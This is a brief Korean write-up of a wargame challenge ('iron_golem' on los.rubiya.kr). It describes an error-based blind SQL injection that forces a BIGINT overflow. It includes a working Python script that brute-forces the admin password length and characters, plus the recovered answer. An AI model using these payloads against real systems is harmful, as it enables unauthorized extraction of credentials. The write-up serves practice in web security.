if 함수를 응용해 참일 때 에러를 출력하도록 하는 Blind SQL Injection 문제로 환원하여 풀었다.
에러는 if 함수의 참일 때의 값에 9999999999*9999999999 를 넣어 오버플로우가 발생하도록 하였다.
파이썬 코드를 짜면 아래와 같다.
import requests
URL = 'https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = "BIGINT value is out of range in '(9999999999 * 9999999999)'"
def query(payload):
cookies = {'PHPSESSID': PHPSESSID}
r = requests.get(URL + payload, cookies=cookies)
content = r.text
return TRUE_PHRASE in content
# 32
def find_pw_length():
pw_len = 1
while query("' or id='admin' and if(length(pw) = {}, 9999999999*9999999999, 0) %23".format(pw_len)) is False:
pw_len += 1
print('pw_len: {}'.format(pw_len))
return pw_len
# 06b5a6c16e8830475f983cc3a825ee9a
def find_pw():
pw_len = find_pw_length()
pw = ''
for pos in range(1, pw_len + 1):
for character in range(0, 128):
if query("' or id='admin' and if(ord(substr(pw,{},1))={}, 9999999999*9999999999, 0) %23".format(pos, character)) is True:
pw += chr(character)
break
print('pw: {}'.format(pw))
find_pw()
